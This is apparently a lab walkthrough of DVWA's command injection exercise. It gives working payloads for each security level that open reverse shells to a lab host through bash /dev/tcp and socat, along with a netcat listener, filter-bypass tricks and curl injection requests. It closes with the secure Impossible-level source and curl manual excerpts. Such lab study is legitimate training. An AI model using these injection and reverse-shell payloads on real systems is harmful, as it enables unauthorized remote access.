DVWA Command Injection
In Linux, && runs the next command only if the previous one succeeded;
|| runs the next command only if the previous one failed.
[Screenshot: example request (High level)]
Low
No filtering at all: the ip parameter is appended to "ping -c 4 " and handed to shell_exec() as typed.
8.8.8.8;/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
;/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
After a while the browser shows a timeout: shell_exec() waits for the command to finish, and the reverse shell keeps running until the listener closes it.
Listener: rlwrap nc -lvnp 9999
Upgrade the shell to a pty once connected: python3 -c "import pty;pty.spawn('/bin/bash')"
If nc is closed in time, the browser shows the command output. The same check from the command line:
curl -X POST "http://192.168.0.141/DVWA/vulnerabilities/exec/" \
-d 'ip=|id&Submit=Submit' \
-H "Cookie: security=low;PHPSESSID=dingp0vcu4e1o6krlg3sk6qsfl" \
-s | grep uid
The curl options used here are explained at the bottom of the page.
https://tkcyber.com/2022/04/01/learning-ctf-with-dvwa-command-injection/
Medium
"&&" and ";" are replaced with the empty string; a single "&" (and "|") is not filtered. The substitutions are applied one after the other, "&&" first and then ";" (the order used in the DVWA source), so "&;&" turns into "&&" after filtering.
In Linux, & runs the command before it in the background. In an interactive shell this prints the job number and PID (https://linuxize.com/post/how-to-run-linux-commands-in-background/); in the non-interactive sh started by shell_exec() nothing is printed, the shell simply does not wait for the backgrounded command and goes on to the next one.
| is the pipe: the output of the command on the left becomes the input of the command on the right. The command after the pipe runs regardless of how the command before it exits.
Examples:
8.8.8.8&/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
8.8.8.8&/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"&
&/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
8.8.8.8|/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"
8.8.8.8|/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"&
|/bin/bash -c "bash -i >& /dev/tcp/192.168.0.161/9999 0>&1"&
High
The following substitutions are applied (after trim(), see below). Note that the third entry is "| " with a trailing space, so a pipe that is not followed by a space is left alone. Otherwise this is the Medium approach with more characters stripped:
$substitutions = array(
'&' => '',
';' => '',
'| ' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);
Remote connection with socat
socat is a multipurpose network tool for Linux; the name comes from "Socket CAT". It is similar to Netcat and can be seen as an enhanced Netcat. [https://cybr.com/ethical-hacking-archives/create-a-reverse-shell-with-socat-dvwa-os-command-injections/]
socat is a command-line utility that establishes two bidirectional byte streams and transfers data between them. (Manual)
It is needed here because the bash reverse shell used at the lower levels does not survive the High filter: stripping "-" turns "bash -c" and "bash -i" into "bash c" and "bash i", and stripping "&" breaks ">&" and "0>&1". The socat command line below contains none of the stripped characters, and the pipe is written with no space after it.
PHP trim(): strips whitespace (or other given characters) from both ends of a string. The High level runs the input through trim() before the substitutions, so surrounding whitespace in the payload is dropped.
8.8.8.8|socat tcp:192.168.0.161:9999 exec:bash,pty,stderr,setsid,sigint
|socat tcp:192.168.0.161:9999 exec:bash,pty,stderr,setsid,sigint
https://tkcyber.com/2022/04/01/learning-ctf-with-dvwa-command-injection/
curl -X POST "http://192.168.0.141/DVWA/vulnerabilities/exec/" \
-d 'ip=|id&Submit=Submit' \
-H "Cookie: security=high;PHPSESSID=dingp0vcu4e1o6krlg3sk6qsfl" \
-s | grep uid
<pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
Impossible
Not exploitable. The source:
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$target = $_REQUEST[ 'ip' ];
$target = stripslashes( $target );
// Split the IP into 4 octets
$octet = explode( ".", $target );
// Check IF each octet is an integer
if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {
// If all 4 octets are int's put the IP back together.
$target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];
// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 4 ' . $target );
}
// Feedback for the end user
echo "<pre>{$cmd}</pre>";
}
else {
// Oops. Let the user know there is a mistake
echo '<pre>ERROR: You have entered an invalid IP.</pre>';
}
}
// Generate Anti-CSRF token
generateSessionToken();
?>

Why this holds: the input is never passed to the shell as typed. It is split on ".", each part must satisfy is_numeric(), and the four parts are joined again, so no shell metacharacter can reach shell_exec(). is_numeric() also accepts forms such as "1e3" or a value with leading whitespace; those are harmless to the shell here but mean the check is not a strict IPv4 validator. filter_var($target, FILTER_VALIDATE_IP) together with escapeshellarg() would be the stricter combination.
curl option reference (excerpts from the curl manual)
-X, --request <method>
-X HEAD will not suffice. You need to use the -I, --head option.
The method string you set with -X, --request will be used for all requests, which if you for example use -L, --location may cause unintended side-effects when curl does not
If -X, --request is provided several times, the last set value will be used.
curl -X "DELETE" https://example.com
curl -X NLST ftp://example.com/
-d, --data <data>
--data-raw is almost the same but does not have a special interpretation of the @ character. To post data purely binary, you should instead use the --data-binary option. To
URL-encode the value of a form field you may use --data-urlencode.
If any of these options is used more than once on the same command line, the data pieces specified will be merged with a separating &-symbol. Thus, using '-d name=daniel -d
named 'foobar' would thus be done with -d, --data @foobar. When -d, --data is told to read from a file like that, carriage returns and newlines will be stripped out. If you
do not want the @ character to have a special interpretation use --data-raw instead.
-d, --data can be used several times in a command line
curl -d "name=curl" https://example.com
curl -d "name=curl" -d "tool=cmdline" https://example.com
curl -d @filename https://example.com
See also --data-binary, --data-urlencode and --data-raw. This option is mutually exclusive to -F, --form and -I, --head and -T, --upload-file.
-H, --header <header/@file>
without knowing perfectly well what you are doing. Remove an internal header by giving a replacement without content on the right side of the colon, as in: -H "Host:". If
you send the custom header with no-value then its header must be terminated with a semicolon, such as -H "X-Custom-Header;" to send "X-Custom-Header:".
-H, --header can be used several times in a command line
curl -H "X-First-Name: Joe" https://example.com
curl -H "User-Agent: yes-please/2000" https://example.com
curl -H "Host:" https://example.com
curl -H @headers.txt https://example.com
-s, --silent
Use -S, --show-error in addition to this option to disable progress meter but still show error messages.
Providing -s, --silent multiple times has no extra effect. Disable it again with --no-silent.
curl -s https://example.com
See also -v, --verbose, --stderr and --no-progress-meter.